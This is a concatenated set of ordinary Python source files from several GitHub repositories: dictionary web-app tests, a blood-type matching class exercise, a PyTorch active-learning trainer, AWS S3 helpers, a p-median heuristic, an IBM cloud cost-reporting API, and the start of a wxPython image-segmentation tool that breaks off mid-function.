[\"roa\\u0111\\u0111i\", [\"N\", \"Pl\", \"Ill\"], [\"ro\\u0111iide\"]]\n ]\n \"\"\"\n forms = set(\n second_list[0]\n for first_list in paradigm\n for second_list in first_list\n )\n if _test_set & forms:\n print(101, 'failed', u' '.join(forms), u' '.join(_test_set))\n return len(_test_set & forms) == 0\n\n return test_doesnt_contain\n\n\nclass WordLookupTests(unittest.TestCase):\n def setUp(self):\n _app = neahtta.app\n # Turn on debug to disable SMTP logging\n _app.debug = True\n _app.logger.removeHandler(_app.logger.smtp_handler)\n\n # Disable caching\n _app.caching_enabled = False\n self.app = _app.test_client()\n self.current_app = _app\n\n if self.current_app.config.fcgi_script_path:\n self.url_base = self.current_app.config.fcgi_script_path\n else:\n self.url_base = ''\n\n\nclass BasicTests(WordLookupTests):\n def test_api_null_lookup(self):\n \"\"\" Test that a null lookup to the api doesn't return a 500\n \"\"\"\n url = self.url_base + \"/lookup/sme/nob/?callback=jQuery3094203984029384&lookup=&lemmatize=true\"\n\n rv = self.app.get(url)\n self.assertEqual(rv.status_code, 200)\n\n def test_api_lookup(self):\n \"\"\" Test that a null lookup to the api doesn't return a 500\n \"\"\"\n url = self.url_base + \"/lookup/sme/nob/?callback=jQuery3094203984029384&lookup=mannat&lemmatize=true\"\n\n rv = self.app.get(url)\n self.assertEqual(rv.status_code, 200)\n\n def test_all_words_for_no_404s(self):\n for lang_pair, form in self.wordforms_that_shouldnt_fail[1::]:\n print(\"testing: %s / %s\" % (repr(lang_pair), repr(form)))\n base = '/%s/%s/' % lang_pair\n rv = self.app.post(\n base, data={\n 'lookup': form,\n })\n\n self.assertEqual(rv.status_code, 200)\n\n\nclass WordLookupDetailTests(WordLookupTests):\n def test_all_words_for_no_404s(self):\n for lang_pair, form in self.wordforms_that_shouldnt_fail[1::]:\n _from, _to = lang_pair\n base = '/detail/%s/%s/%s.html' % (_from, _to, form)\n print(\"testing: %s \" % base)\n rv = self.app.get(base)\n\n self.assertEqual(rv.status_code, 200)\n\n\nclass WordLookupAPITests(WordLookupTests):\n def test_all_words_for_no_404s(self):\n from urllib import urlencode\n for lang_pair, form in self.wordforms_that_shouldnt_fail[1::]:\n _from, _to = lang_pair\n base = self.url_base + u'/lookup/%s/%s/?' % (_from, _to)\n url = base + urlencode({'lookup': form.encode('utf-8')})\n print(\"testing: %s \" % url)\n rv = self.app.get(url)\n print(\" got: %d bytes\" % len(rv.data))\n\n self.assertEqual(rv.status_code, 200)\n\n\nclass ParadigmGenerationTests(WordLookupTests):\n def test_all_words_for_no_404s(self):\n for (source, target, lemma, error_msg,\n test_func) in self.paradigm_generation_tests:\n base = self.url_base + '/paradigm/%s/%s/%s/' % (\n source,\n target,\n lemma,\n )\n print(\"testing: %s \" % base)\n rv = self.app.get(base)\n result = simplejson.loads(rv.data)\n\n if result['input']['lemma'] == lemma:\n print('paradigm')\n test_result = test_func(result['paradigms'])\n self.assertTrue(test_result)\n\n # self.assertEqual(rv.status_code, 200)\n","repo_name":"giellatekno/neahttadigisanit","sub_path":"src/neahtta/tests/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":6491,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"12867614133","text":"import requests\n\n\ndef main():\n \"\"\"\n Get the dict that contains the donor and recipient id and post the match\n result to the server\n \"\"\"\n r = requests.get('http://vcm-7631.vm.duke.edu:5002/get_patients/jl922')\n\n if r.status_code == 200:\n returned_dict = r.json()\n # print(returned_dict)\n\n \"\"\"\n Obtain the blood_type_dict by person's id\n \"\"\"\n blood_type_dict = {}\n for person_type, id in returned_dict.items():\n r = requests.get('http://vcm-7631.vm.duke.edu:5002/get_blood_type'\n '/{}'.format(id))\n\n if r.status_code == 200:\n blood_type_dict[person_type] = {'id': id, 'blood_type': r.text}\n\n print(blood_type_dict)\n\n \"\"\"\n Judge whether it's a match for blood_type between donor and recipient\n \"\"\"\n blood_match = ''\n if blood_type_dict['Donor']['blood_type'] == \\\n blood_type_dict['Recipient']['blood_type']:\n blood_match = 'Yes'\n else:\n blood_match = 'No'\n\n \"\"\"\n Send out a POST request to see whether your judgement on the\n blood_type match is Correct or Incorrect\n \"\"\"\n post_dict = {'Name': 'jl922', 'Match': blood_match}\n r = requests.post('http://vcm-7631.vm.duke.edu:5002/match_check',\n json=post_dict)\n if r.status_code == 200:\n print(r.text)\n\n return 0\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"junqilu/Classwork_Fall2022","sub_path":"blood_match.py","file_name":"blood_match.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6780582553","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom collections import Counter\n\n\nclass Training:\n def __init__(self, X, Y, X_te, Y_te, net, handler, args):\n \"\"\"\n\n \"\"\"\n self.X = X\n self.Y = Y\n self.X_te = X_te\n self.Y_te = Y_te\n #self.idxs_lb = idxs_lb\n self.net = net\n self.handler = handler\n self.args = args\n self.n_pool = len(Y)\n self.class_distribution = {}\n use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n def query(self, n):\n pass\n '''\n def update(self, idxs_lb):\n self.idxs_lb = idxs_lb\n '''\n def get_distribution(self):\n return self.class_distribution\n \n def _train(self, epoch, loader_tr, optimizer):\n self.clf.train()\n total_loss = 0\n for batch_idx, (x, y, idxs) in enumerate(loader_tr):\n \"\"\"\n print('_train x shape {}'.format(x.shape))\n print('_train y shape {}'.format(y.shape))\n \"\"\"\n x, y = x.to(self.device), y.to(self.device)\n optimizer.zero_grad()\n out, e1 = self.clf(x)\n # print('output shape {}'.format(out.shape))\n loss = F.cross_entropy(out, y)\n total_loss += loss.cpu().item()\n loss.backward()\n optimizer.step()\n \n return total_loss/len(loader_tr)\n \n def predict(self, X, Y):\n loader_te = DataLoader(self.handler(X, Y,\n transform=self.args['transform']['test']),\n shuffle=True, **self.args['loader_te_args'])\n self.clf.eval()\n total_loss = 0\n P = torch.zeros(len(Y), dtype=Y.dtype)\n with torch.no_grad():\n for x, y, idxs in loader_te:\n \"\"\"\n print('prediction x shape {}'.format(x.shape))\n print('prediction y shape {}'.format(y.shape))\n \"\"\"\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n loss = F.cross_entropy(out, y)\n total_loss += loss.cpu().item()\n pred = out.max(1)[1]\n if str(self.device) == 'cuda':\n P[idxs] = pred.cpu()\n else:\n P[idxs] = pred\n \n return P, total_loss/len(loader_te)\n\n def check_accuracy(self, X, Y):\n loader = DataLoader(self.handler(X, Y,\n transform=self.args['transform']['test']),\n shuffle=True, **self.args['loader_te_args'])\n self.clf.eval()\n num_correct, num_samples = 0, 0\n \n for x, y, idxs in loader:\n x, y = x.to(self.device), y.to(self.device)\n \n scores, e1 = self.clf(x)\n _, preds = scores.data.cpu().max(1)\n if str(self.device) == 'cuda':\n y = y.cpu()\n num_correct += (preds == y).sum()\n num_samples += x.size(0)\n \n # Return the fraction of datapoints that were correctly classified.\n acc = float(num_correct) / num_samples\n return acc \n \n def train(self):\n n_epoch = self.args['n_epoch']\n n_classes = self.args['n_classes']\n self.clf = self.net(n_classes=n_classes).to(self.device)\n #print(self.clf)\n if self.args['fc_only']:\n # for feature extraction using transfer learn\n print(\"feature extraction\")\n optimizer = optim.SGD(self.clf.fc.parameters(), **self.args['optimizer_args'])\n #optimizer = optim.Adam(self.clf.fc.parameters(), betas=(0.9,0.99), lr=0.00005)\n else:\n optimizer = optim.SGD(self.clf.parameters(), **self.args['optimizer_args'])\n \n # get training data index\n # make sure idxs gets updated prior to calling train\n #idxs_train = np.arange(self.n_pool)[self.idxs_lb]\n #print(\"training with {} datapoints\".format(sum(self.idxs_lb)))\n # compute distribution of labels\n all_y = self.Y\n self.class_distribution = dict(Counter(all_y.numpy()))\n loader_tr = DataLoader(self.handler(self.X,\n self.Y,\n transform=self.args['transform']['train']),\n shuffle=True,\n **self.args['loader_tr_args'])\n print(\"epoch\\ttrain_loss\\ttest_loss\\ttrain_acc\\ttest_acc\")\n for epoch in range(1, n_epoch+1):\n # print(\"epoch {}\".format(epoch))\n train_loss = self._train(epoch, loader_tr, optimizer)\n _, test_loss = self.predict(self.X_te, self.Y_te)\n \n train_acc = self.check_accuracy(self.X, self.Y)\n test_acc = self.check_accuracy(self.X_te, self.Y_te)\n print(\"{}\\t{}\\t\\t{}\\t\\t{}\\t\\t{}\".format(epoch, round(train_loss, 4), round(test_loss, 4), \n round(train_acc, 6), round(test_acc, 6)))\n\n def sample_embeddings(self, q_idxs):\n # extract embeddings for samples indexed by q_idxs\n loader_sample = DataLoader(self.handler(self.X[q_idxs],\n self.Y[q_idxs],\n transform=self.args['transform']['test']),\n shuffle=True,\n **self.args['loader_sample_args'])\n # get embeddings\n self.clf.eval()\n emb = np.zeros((len(q_idxs), self.clf.get_embedding_dim()))\n with torch.no_grad():\n for x, y, idxs in loader_sample:\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n emb[idxs] = e1\n\n return emb\n\n def sample_images(self, q_idxs, n_images):\n # extract embeddings for these new samples\n sample_images = self.handler(self.X[q_idxs],\n self.Y[q_idxs])\n images = [x for x, y, idxs in sample_images if idxs < n_images]\n return images\n\n def predict_prob(self, X, Y):\n loader_te = DataLoader(self.handler(X, Y,\n transform=self.args['transform']['test']),\n shuffle=False, **self.args['loader_te_args'])\n self.clf.eval()\n # probs = torch.zeros([len(Y), len(np.unique(Y))])\n # corner case for caltech dataset, the remaining training data after multiple rounds\n # of active learning comes from less than 10 classes (class 6 for example, does not have\n # training data left to pick\n probs = torch.zeros([len(Y), self.args['n_classes']])\n with torch.no_grad():\n for x, y, idxs in loader_te:\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n # get probabilities by computing softmax of the output\n prob = F.softmax(out, dim=1)\n if str(self.device) == 'cuda':\n # print(\"predict proba index {}\".format(idxs.shape))\n # print(\"predict proba prob shape {}\".format(prob.shape))\n # print(\"predict proba probs shape {}\".format(probs.shape))\n probs[idxs] = prob.cpu()\n else:\n probs[idxs] = prob\n\n return probs\n\n def predict_prob_dropout(self, X, Y, n_drop):\n # each n_drop is a mask\n # run multiple mask to estimate uncertainty\n loader_te = DataLoader(self.handler(X, Y,\n transform=self.args['transform']['test']),\n shuffle=False, **self.args['loader_te_args'])\n # set to train mode to get dropout masks\n self.clf.train()\n probs = torch.zeros([len(Y), self.args['n_classes']])\n for i in range(n_drop):\n print('n_drop {}/{}'.format(i+1, n_drop))\n with torch.no_grad():\n for x, y, idxs in loader_te:\n x, y = x.to(self.device), y.to(self.device)\n out, e1 = self.clf(x)\n prob = F.softmax(out, dim=1)\n # add prob across n_drop\n if str(self.device) == 'cuda':\n probs[idxs] += prob.cpu()\n else: \n probs[idxs] += prob\n probs /= n_drop\n\n return probs\n \n def set_clf(self, path):\n # model trained on cpu, load to either CPU or GPU\n n_classes = self.args['n_classes']\n # self.clf = self.net(n_classes=n_classes).to(self.device)\n self.clf = self.net(n_classes=n_classes)\n print(\"loading model\")\n self.clf.load_state_dict(torch.load(path, map_location=self.device))\n self.clf.to(self.device)\n","repo_name":"nishamuktewar/data-replication","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":9103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9013694120","text":"\nimport zipfile\nimport os\nimport json\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\n\nbucket_name = 'randomfirstbucket'\ntrain_prefix = 'Input/train/'\nval_prefix = 'Input/val/'\ntrain_bucket_prefix = bucket_name + '/' + train_prefix \nval_bucket_prefix = bucket_name + '/' + val_prefix \n\nzipped_data = r'C:\\Users\\gad\\Desktop\\repos\\AI\\aws\\data\\dataset.zip'\ninput_data_dir = r'C:\\Users\\gad\\Desktop\\repos\\AI\\aws\\data\\input'\ntrain_dir = os.path.join(input_data_dir, 'train')\nsmall_train_dir = os.path.join(input_data_dir, 'small_train')\ntest_dir = os.path.join(input_data_dir, 'test')\nannotated_data_dir = r'C:\\Users\\gad\\Desktop\\repos\\AI\\aws\\data\\annotated'\nmanifest_file = r'C:\\Users\\gad\\Desktop\\repos\\AI\\aws\\data\\output.manifest'\n\n\ndef extract_files(src_file, dst_dir):\n with zipfile.ZipFile(src_file, 'r') as file :\n file.extractall(dst_dir)\n\n\ndef read_manifest(file):\n with open(file, 'r') as f :\n return f.read()\n\n\n\n\ndef create_bucket( bucket_name):\n\n s3_resource = boto3.resource('s3')\n response = s3_resource.create_bucket(Bucket = bucket_name)\n\n return response\n\ndef upload_file( bucket_name, file_name, dst_folder = None):\n s3_resource = boto3.resource('s3')\n \n obj = s3_resource.Bucket(bucket_name).Object('Input')\n status = obj.upload_file(Filename = file_name)\n return status\n\ndef create_dir(bucket_name, dir_name):\n if dir_name[-1] != '/' :\n dir_name += '/'\n s3_resource = boto3.resource('s3')\n bucket = s3_resource.Bucket(bucket_name)\n status = bucket.new_key(dir_name)\n return status\n\ndef get_contents(bucket):\n s3 = boto3.client('s3')\n bucket = s3.list_objects(Bucket = bucket_name)\n contents = [file['Key'] for file in bucket['Contents']]\n return contents","repo_name":"gadm21/AI","sub_path":"aws/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70403181342","text":"import numpy as np\nfrom utils import get_cost, load_csv, plot_solution, print_output, compare_solutions\nimport time\nfrom neighbourhood_search import run_neighbourhood_search\n'''\nA naive algorithm for finding a solution to an uncapacitated p-median problem\nPlaces stations in the cities with the lowest average distance from all other cities\n '''\ndef lowest_avg(cities, num_stations):\n\taverages = {}\n\t# find each cities average distance to all other cities\n\tfor i, city in enumerate(cities):\n\t\tcity_avg = np.average(city)\n\t\taverages[i] = city_avg\n\t# sort the averages\n\tsorted_averages = {key: val for key, val in sorted(\n\t\taverages.items(), key=lambda ele: ele[1], reverse=False)}\n\t# retrieve the top num_stations cities\n\tbest = list(sorted_averages.keys())[:num_stations]\n\t# assign stations to each city which was identified with the lowest average distance\n\tsol = [1 if x in best else 0 for x in averages.keys()]\n\n\tbest_cost = get_cost(sol, cities)\n\treturn sol, best_cost\n\nif __name__ == \"__main__\":\n\tcities = load_csv(\"./data/500_cities.csv\")\n\tnum_stations = 100\n\tstart = time.time()\n\tsolution, best_cost = lowest_avg(cities, num_stations)\n\tend = time.time() - start\n\tprint_output(\"Lowest Average\", end, best_cost, len(cities), num_stations)\n\t# plot_solution(solution, cities)\n\tn_sol, n_cost = run_neighbourhood_search(solution, cities)\n\tend = time.time() - start\n\tprint_output(\"Lowest Average Neighbourhood Search\", end, n_cost, len(cities), num_stations)\n\n\tsolutions = [solution, n_sol]\n\tnames = [f\"Lowest Average - {best_cost}\", f\"Lowest Average Neighbourhood Search - {n_cost}\"]\n\tcompare_solutions(solutions, names, cities)\n\t# plot_solution(n_sol, cities)\n\t\n\n\n\n\n\n\n\n","repo_name":"afestein/sit316-project","sub_path":"lowest_average_distance.py","file_name":"lowest_average_distance.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41076420275","text":"import json\nimport logging\n\nfrom apiflask import APIBlueprint, input\nfrom sqlalchemy import and_, extract, func\n\nfrom ibm.auth import authenticate, Response\nfrom ibm.common.consts import INT_MONTH_TO_STR, MONTHS_STR_TO_INT\nfrom ibm.common.utils import get_month_interval\nfrom ibm.models import IBMCloud, IBMCost, IBMResourceInstancesCost, IBMIdleResource, IBMResourceControllerData, \\\n IBMResourceTracking, IBMRightSizingRecommendation\nfrom ibm.web import db as ibmdb\nfrom .schemas import IBMCostReportingQuerySchema\n\nLOGGER = logging.getLogger(__name__)\n\nibm_reporting = APIBlueprint('ibm_reporting', __name__, tag=\"IBM Reporting\")\n\n\n@ibm_reporting.route('/cost_reporting', methods=['GET'])\n@authenticate\n@input(IBMCostReportingQuerySchema, location='query')\ndef get_ibm_cloud_report(cloud_query_params, user):\n \"\"\"\n Get IBM Cloud Cost Report\n \"\"\"\n cloud_id = cloud_query_params.get(\"cloud_id\")\n month = cloud_query_params.get(\"month\")\n\n if cloud_id:\n cloud = ibmdb.session.query(IBMCloud).filter_by(user_id=user[\"id\"], id=cloud_id).first()\n else:\n cloud = ibmdb.session.query(IBMCloud).filter_by(user_id=user[\"id\"]).all()\n if not cloud:\n LOGGER.info(f\"No IBM Cloud accounts found for user with ID {user['id']}\")\n return Response(status=404)\n\n if month and month.lower() not in MONTHS_STR_TO_INT.keys():\n return Response(status=400)\n\n start, end = get_month_interval(month)\n month = start.month\n year = start.year\n\n cost_obj = ibmdb.session.query(IBMCost).filter_by(cloud_id=cloud_id, billing_month=start).first()\n if not cost_obj:\n LOGGER.info(f\"No IBM Cloud Cost with ID {cloud_id} not found\")\n return Response(status=204)\n\n resource_instances_cost_crns_sq = \\\n ibmdb.session.query(IBMResourceInstancesCost.crn).filter_by(cost_id=cost_obj.id).subquery()\n\n idle_resource_saving = ibmdb.session.query(func.sum(IBMIdleResource.estimated_savings).label(\n 'idle_resource_saving')).filter(and_(extract('month', IBMIdleResource.created_at) == month,\n extract('year', IBMIdleResource.created_at) == year)).filter_by(\n cloud_id=cloud_id).all()\n\n right_sizing_saving = ibmdb.session.query(func.sum(IBMRightSizingRecommendation.estimated_monthly_savings).label(\n 'right_sizing_saving')).filter_by(cloud_id=cloud_id).filter(\n and_(extract('month', IBMRightSizingRecommendation.created_at) == month,\n extract('year', IBMRightSizingRecommendation.created_at) == year)).filter_by(\n cloud_id=cloud_id).all()\n\n savings_achieved = ibmdb.session.query(\n func.sum(IBMResourceTracking.estimated_savings).label(\"estimated_savings\")).filter(\n and_(extract('month', IBMResourceTracking.action_taken_at) == month,\n extract('year', IBMResourceTracking.action_taken_at) == year)).filter_by(cloud_id=cloud_id).all()\n\n idle_resource_saving = idle_resource_saving[0][0] if idle_resource_saving[0][0] else 0.0\n right_sizing_saving = right_sizing_saving[0][0] if right_sizing_saving[0][0] else 0.0\n savings_achieved = savings_achieved[0][0] if savings_achieved[0][0] else 0.0\n savings = idle_resource_saving + right_sizing_saving\n\n ibm_resources_created_this_month_json = []\n ibm_resources_deleted_this_month_json = []\n older_resources_costed_this_month_json = []\n ibm_resources = ibmdb.session.query(IBMResourceControllerData).filter_by(cloud_id=cloud_id).\\\n filter(IBMResourceControllerData.crn.in_(resource_instances_cost_crns_sq)).all()\n for ibm_resource in ibm_resources:\n if ibm_resource.created_at and ibm_resource.created_at > start and ibm_resource.created_at < end:\n ibm_resources_created_this_month_json.append(ibm_resource.to_reporting_json(month=start))\n elif ibm_resource.deleted_at and ibm_resource.deleted_at > start and ibm_resource.deleted_at < end:\n ibm_resources_deleted_this_month_json.append(ibm_resource.to_reporting_json(month=start))\n else:\n older_resources_costed_this_month_json.append(ibm_resource.to_reporting_json(month=start))\n\n right_sizing_recommendation_count = ibmdb.session.query(IBMRightSizingRecommendation).filter(\n and_(extract('month', IBMRightSizingRecommendation.created_at) == month,\n extract('year', IBMRightSizingRecommendation.created_at) == year)).filter_by(\n cloud_id=cloud_id).count() or 0\n\n idle_resource_recommendation_count = ibmdb.session.query(IBMIdleResource).filter(\n and_(extract('month', IBMIdleResource.created_at) == month,\n extract('year', IBMIdleResource.created_at) == year)).filter_by(cloud_id=cloud_id).count() or 0\n\n total_recommendation_generated = right_sizing_recommendation_count + idle_resource_recommendation_count\n\n actions_taken_at = ibmdb.session.query(IBMResourceTracking).filter(\n and_(extract('month', IBMResourceTracking.action_taken_at) == month,\n extract('year', IBMResourceTracking.action_taken_at) == year)).filter_by(cloud_id=cloud_id).count()\n\n cost_report_json = {\n \"summary\": {\n \"cloud_id\": cloud_id,\n \"name\": cloud.name,\n \"month\": INT_MONTH_TO_STR[month],\n \"recommendations\": {\n \"total_recommendations\": total_recommendation_generated,\n \"action_taken\": actions_taken_at,\n \"actions_pending\": total_recommendation_generated-actions_taken_at,\n \"cost\": cost_obj.billable_cost,\n \"realized_savings\": savings,\n \"potential_savings\": savings - savings_achieved,\n },\n },\n \"details\": {\n \"resources_created_this_month\": ibm_resources_created_this_month_json,\n \"resources_deleted_this_month\": ibm_resources_deleted_this_month_json,\n \"older_resources\": older_resources_costed_this_month_json\n }\n }\n\n return Response(json.dumps(cost_report_json), status=200, mimetype=\"application/json\")\n","repo_name":"talha927/cloud-ibm-test","sub_path":"ibm/web/ibm/cost_reporting/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36735602160","text":"# -*- coding: utf-8 -*-\r\n\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nimport pickle\r\nimport sys\r\nimport time\r\nimport threading\r\nimport json\r\n\r\nimport wx\r\nimport wx.xrc\r\n\r\n\"\"\"\r\nids\r\n76,77 - left/right\r\n78 - slider slice\r\n79 - num slice combo box\r\n80 - erase\r\n81 - remove last vertex\r\n82 - contrast slider\r\n83 - save all\r\n84 - save current polygon/contour\r\n85 - contour drawing style\r\n86 - brush drawing style\r\n87 - brush size\r\n88 - view axis\r\n89 - delete brush\r\n90-xxx classes\r\n201 - send to back\r\n202 - undo last polygon\r\n203 - select previous polygon\r\n204 - select next polygon\r\n205 - back to segmentation\r\n206 - change class dropdown\r\n207 - change class button\r\n208 - Previous\r\n209 - Next\r\n210 - Hide segmentation\r\n\"\"\"\r\n\r\n# global vars\r\nSEG_PATH_IN = ''\r\nSEG_PATH_OUT = ''\r\nFILE_PATH = []\r\nPREV_FILE_PATH = []\r\nIMAGE_WIDTH = 0\r\nIMAGE_HEIGHT = 0\r\nIMAGE_EXTENSION = ''\r\nNUM_SLICES = 0\r\ncurrent_image = []\r\nimage_np_all_slices = []\r\nimage_np_all_slices_normed = []\r\nimage_np_all_slices_segmentation = []\r\nimage_np_all_slices_normed_plot = []\r\nimage_np_all_slices_segmentation_plot = []\r\npolygons = []\r\npolygons_to_be_deleted = []\r\ncurrent_polygon_to_be_deleted_idx = 0\r\nnum_polygons = 0\r\nold_area_list = []\r\ncurrent_operation = []\r\noperation_changed = True\r\n\r\nSTART_BUTTON_ID_CLASSES = 90\r\n\r\nFIRST_CLICK = False\r\n\r\nHIDE_SEGMENTATION = False\r\n\r\nimage_previous_segmentation_overlaid = []\r\n\r\ntry:\r\n strings = json.load(open(\"languageConfig.yaml\"))\r\nexcept:\r\n pass\r\n\r\ndef _(s):\r\n try:\r\n return strings[s]\r\n except Exception as e:\r\n return s\r\n\r\ntry:\r\n classConfigLines = open(\"classConfig.yaml\").read().splitlines()\r\nexcept Exception as e:\r\n print('No/corruped classConfig.yaml file. Correct format: {className} {R} {G} {B} , where R,G,B range from 0..255')\r\n app = wx.App(None)\r\n style = wx.OK\r\n dialog = wx.MessageDialog(None, 'Missing/corrupted classConfig.yaml file. Correct format: {className} {R} {G} {B} , where R,G,B range from 0..255', 'Error', style)\r\n dialogResult = dialog.ShowModal()\r\n dialog.destroy()\r\n sys.exit(1)\r\n #dialog.SetYesNoCancelLabels(_(\"Segment image\"), _(\"Edit segmented image\"), _(\"Cancel\"))\r\n\r\n\r\nCLASS_NAMES = []\r\nCLASS_COLORS_RGB = []\r\n\r\nfor line in classConfigLines:\r\n x=line.split(' ')\r\n CLASS_NAMES.append(x[0])\r\n CLASS_COLORS_RGB.append((int(x[1]), int(x[2]), int(x[3])))\r\n\r\n\r\noperations_list = ['segment', 'edit']\r\n\r\noperations_list_translated = [_('segment'), _('edit')]\r\n\r\nBORDER_PADDING = 70\r\n\r\nNUM_CLASSES = len(CLASS_NAMES)\r\n\r\n\r\n# helpers / GUI\r\n\r\ndef selectOperation():\r\n # style = wx.YES_NO | wx.ICON_QUESTION | wx.CANCEL | wx.HELP\r\n style = wx.YES_NO | wx.ICON_QUESTION | wx.CANCEL\r\n dialog = wx.MessageDialog(None, _('Select operation'), _('Image segmentation'), style)\r\n\r\n # argh, wx 2.9+ :/\r\n try:\r\n dialog.SetYesNoCancelLabels(_(\"Segment image\"), _(\"Edit segmented image\"), _(\"Cancel\"))\r\n dialog.SetHelpLabel(_(\"Quit\"))\r\n except:\r\n dialog.setMessage(_(\"Cancel\"))\r\n dialogResult = dialog.ShowModal()\r\n result = []\r\n if dialogResult == wx.ID_YES:\r\n result = 'segment'\r\n elif dialogResult == wx.ID_NO:\r\n result = 'edit'\r\n else:\r\n result = 'quit'\r\n dialog.Destroy()\r\n return result\r\n\r\n\r\ndef selectFolder():\r\n style = wx.DD_DIR_MUST_EXIST | wx.DD_CHANGE_DIR\r\n # dialog = wx.DirDialog(None, \"Please choose image directory\", style)\r\n dialog = wx.DirDialog(None, \"Please choose image directory\", style=style)\r\n\r\n if dialog.ShowModal() == wx.ID_OK:\r\n result = dialog.GetPath()\r\n else:\r\n result = \"\"\r\n dialog.Destroy()\r\n return result\r\n\r\n\r\ndef getSingleFilePath(wildcard):\r\n style = wx.FD_OPEN | wx.FD_FILE_MUST_EXIST\r\n dialog = wx.FileDialog(None, _('Open image'), wildcard=wildcard, style=style)\r\n if dialog.ShowModal() == wx.ID_OK:\r\n path = dialog.GetPath()\r\n else:\r\n path = None\r\n dialog.Destroy()\r\n return path\r\n\r\n\r\ndef bbox_np(img):\r\n rows = np.any(img, axis=1)\r\n cols = np.any(img, axis=0)\r\n rmin, rmax = np.where(rows)[0][[0, -1]]\r\n cmin, cmax = np.where(cols)[0][[0, -1]]\r\n\r\n return rmin, rmax, cmin, cmax\r\n\r\n\r\ndef drawSegmentationPolys(fromArea=0, current_seg=0, current_class=0, send_to_back=False, limits=(0, 0, 0, 0)):\r\n polygons_area = [item[0] for item in polygons]\r\n min_area = min(polygons_area)\r\n\r\n if min_area >= fromArea:\r\n # print('here!', min_area, fromArea)\r\n # print(polygons)\r\n # burn in only last one\r\n for idx_class in range(NUM_CLASSES):\r\n image_np_all_slices_segmentation[limits[0]:limits[1], limits[2]:limits[3], idx_class][\r\n np.where(current_seg[limits[0]:limits[1], limits[2]:limits[3]] > 0)] = 0\r\n image_np_all_slices_segmentation[limits[0]:limits[1], limits[2]:limits[3], current_class] = np.logical_or(\r\n image_np_all_slices_segmentation[limits[0]:limits[1], limits[2]:limits[3], current_class],\r\n current_seg[limits[0]:limits[1], limits[2]:limits[3]])\r\n else: # redraw from fromArea\r\n for poly in polygons:\r\n if poly[0] > fromArea:\r\n continue\r\n bw_poly = cv2.fillPoly(np.zeros((poly[3][1] - poly[3][0], poly[3][3] - poly[3][2])), [poly[2]], 255, 8, 0,\r\n (-poly[3][2], -poly[3][0]))\r\n for idx_class in range(NUM_CLASSES):\r\n image_np_all_slices_segmentation[poly[3][0]:poly[3][1], poly[3][2]:poly[3][3], idx_class][\r\n np.where(bw_poly > 0)] = 0\r\n image_np_all_slices_segmentation[:, :, poly[1]][poly[3][0]:poly[3][1],\r\n poly[3][2]:poly[3][3]] = np.logical_or(\r\n image_np_all_slices_segmentation[poly[3][0]:poly[3][1], poly[3][2]:poly[3][3], poly[1]], bw_poly)\r\n\r\n\r\ndef redrawSegmentationPolys(polygonss, highlighted=None):\r\n global image_np_all_slices_segmentation\r\n highlighted_poly = []\r\n if highlighted != None:\r\n highlighted_poly = polygonss[highlighted]\r\n polygonss = sorted(polygonss, reverse=True, key=lambda x: x[0])\r\n if highlighted != None:\r\n highlighted = polygonss.index(highlighted_poly)\r\n image_np_all_slices_segmentation = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, NUM_CLASSES), dtype=np.bool_)\r\n for idx_current_poly, poly in enumerate(polygonss):\r\n if highlighted != None:\r\n if idx_current_poly == highlighted:\r\n bw_poly = cv2.fillPoly(np.zeros((poly[3][1] - poly[3][0], poly[3][3] - poly[3][2])), [poly[2]], 255, 8,\r\n 0,\r\n (-poly[3][2], -poly[3][0]))\r\n else:\r\n bw_poly = cv2.drawContours(np.zeros((poly[3][1] - poly[3][0], poly[3][3] - poly[3][2])), [poly[2]], 0,\r\n 255, 5, 8, 0, 0, (-poly[3][2], -poly[3][0]))\r\n else:\r\n bw_poly = cv2.fillPoly(np.zeros((poly[3][1] - poly[3][0], poly[3][3] - poly[3][2])), [poly[2]], 255, 8, 0,\r\n (-poly[3][2], -poly[3][0]))\r\n #for idx_class in range(NUM_CLASSES):\r\n image_np_all_slices_segmentation[poly[3][0]:poly[3][1], poly[3][2]:poly[3][3], :][np.where(bw_poly > 0)] = 0\r\n\r\n image_np_all_slices_segmentation[:, :, poly[1]][poly[3][0]:poly[3][1], poly[3][2]:poly[3][3]] = np.logical_or(\r\n image_np_all_slices_segmentation[poly[3][0]:poly[3][1], poly[3][2]:poly[3][3], poly[1]], bw_poly)\r\n\r\n\r\ndef plotAnnotationsOverlay():\r\n rgb_overlay = plotAnnotations()\r\n img_out = np.zeros_like(rgb_overlay)\r\n if not HIDE_SEGMENTATION:\r\n cv2.addWeighted(rgb_overlay, 0.5, image_np_all_slices_normed, 1, 0, img_out)\r\n else:\r\n img_out = image_np_all_slices_normed\r\n return img_out\r\n\r\n\r\ndef plotAnnotations():\r\n rgb_overlay = np.zeros_like(image_np_all_slices_normed)\r\n for idx_class in range(NUM_CLASSES):\r\n rgb_overlay[image_np_all_slices_segmentation[:, :, idx_class] > 0] = CLASS_COLORS_RGB[idx_class]\r\n # print(np.count_nonzero(rgb_overlay))\r\n return rgb_overlay\r\n\r\n\r\ndef 